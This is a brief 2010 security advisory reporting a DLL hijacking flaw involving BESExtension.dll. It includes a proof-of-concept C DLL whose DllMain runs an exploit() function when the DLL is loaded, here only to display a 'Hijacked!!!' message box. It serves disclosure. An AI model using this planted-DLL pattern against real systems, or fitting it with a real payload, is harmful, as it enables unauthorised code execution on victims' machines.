============ { Advisory 22/11/2010 } =============
Vulnerable Dll: BESExtension.dll
Tested on: Windows 7 x32 and Windows xp sp3 x32
#include <windows.h>
BOOL WINAPI DllMain ( HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
exploit();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
int exploit()
{
MessageBox(0, “Hijacked!!!”, “DLL Message”, MB_OK);
}
Credits:
# Discoverd By: Locu
# Website: https://xlocux.wordpress.com
# Contacts: xlocux[-at-]gmail.com
================== { EOF } =====================
One comment